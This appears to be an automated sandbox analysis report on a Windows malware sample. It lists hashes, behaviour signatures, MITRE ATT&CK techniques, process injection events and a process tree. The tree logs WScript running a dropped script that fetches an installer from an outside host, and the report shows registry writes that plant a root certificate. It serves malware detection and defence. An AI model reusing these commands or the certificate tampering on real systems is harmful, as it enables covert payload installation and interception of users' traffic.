ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19

General

Target

ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe
Size

184KB
MD5

7e8b823cd891cdf4f674c7e24eaef1d0
SHA1

4850743b509cf017c5cdaa0453cd2af922504478
SHA256

ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19
SHA512

cf6e2dfdf7cb541c971e8d9d070ff2969e96b8f75b1843a43f29f1d622b311cc5ebf9d6432eee9009166df9865301eb92de3bdcbe36555dc7ec57ae2521d1c45
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3D:/7BSH8zUB+nGESaaRvoB7FJNndny

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
3	900	WScript.exe
6	900	WScript.exe
7	1676	WScript.exe
9	1676	WScript.exe
13	1676	WScript.exe
15	1676	WScript.exe
16	1676	WScript.exe
18	1676	WScript.exe
20	1676	WScript.exe
21	2016	WScript.exe
23	2016	WScript.exe
24	1924	WScript.exe
26	1924	WScript.exe
29	928	WScript.exe
31	928	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies system certificate store 2 TTPs 3 IoCs

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 0f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47420000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 19000000010000001000000068cb42b035ea773e52ef50ecf50ec529030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47409000000010000000c000000300a06082b060105050703011d0000000100000010000000918ad43a9475f78bb5243de886d8103c140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c00b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f00740000000f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f20000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	WScript.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	3	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	7	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	24	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	29	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1172 wrote to memory of 900	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	28
PID 1172 wrote to memory of 900	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	28
PID 1172 wrote to memory of 900	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	28
PID 1172 wrote to memory of 900	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	28
PID 1172 wrote to memory of 1676	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	31
PID 1172 wrote to memory of 1676	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	31
PID 1172 wrote to memory of 1676	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	31
PID 1172 wrote to memory of 1676	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	31
PID 1172 wrote to memory of 2016	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	33
PID 1172 wrote to memory of 2016	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	33
PID 1172 wrote to memory of 2016	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	33
PID 1172 wrote to memory of 2016	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	33
PID 1172 wrote to memory of 1924	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	34
PID 1172 wrote to memory of 1924	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	34
PID 1172 wrote to memory of 1924	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	34
PID 1172 wrote to memory of 1924	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	34
PID 1172 wrote to memory of 928	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	35
PID 1172 wrote to memory of 928	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	35
PID 1172 wrote to memory of 928	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	35
PID 1172 wrote to memory of 928	1172	ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe	35

C:\Users\Admin\AppData\Local\Temp\ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe
"C:\Users\Admin\AppData\Local\Temp\ad05f7bcea55b5f51d0c62bb0741d20ddac26ceea4247b821f594a24cdbb4a19.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1172
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB8F4.js" http://www.djapp.info/?domain=VLNiAWMKza.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB8F4.exe
  2⤵
  - Blocklisted process makes network request
  PID:900
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB8F4.js" http://www.djapp.info/?domain=VLNiAWMKza.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB8F4.exe
  2⤵
  - Blocklisted process makes network request
  - Modifies system certificate store
  PID:1676
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB8F4.js" http://www.djapp.info/?domain=VLNiAWMKza.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB8F4.exe
  2⤵
  - Blocklisted process makes network request
  PID:2016
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB8F4.js" http://www.djapp.info/?domain=VLNiAWMKza.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB8F4.exe
  2⤵
  - Blocklisted process makes network request
  PID:1924
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fufB8F4.js" http://www.djapp.info/?domain=VLNiAWMKza.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fufB8F4.exe
  2⤵
  - Blocklisted process makes network request
  PID:928

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Install Root Certificate

Modify Registry

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\fufB8F4.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\XV6UHMVG.txt

Filesize
100B

MD5
eba6f7bc2da7f1f408be40091941b58d

SHA1
77ffbda2e693f0e384b709e2dba5714d3ed1f5f3

SHA256
e36ae5e15d86d4152e6e17a6837a423e6be2d97248c8bef7b3f2268156e7fd56

SHA512
41ab483d989932ed50fdef5a96cc7de7c1de9764c0c934949e34e9727d177b33ef5c637c4ce79f8681e977fca2bd3d72d0554025e1f63423eb151f9786032c49

Download Submit
memory/1172-54-0x00000000759F1000-0x00000000759F3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing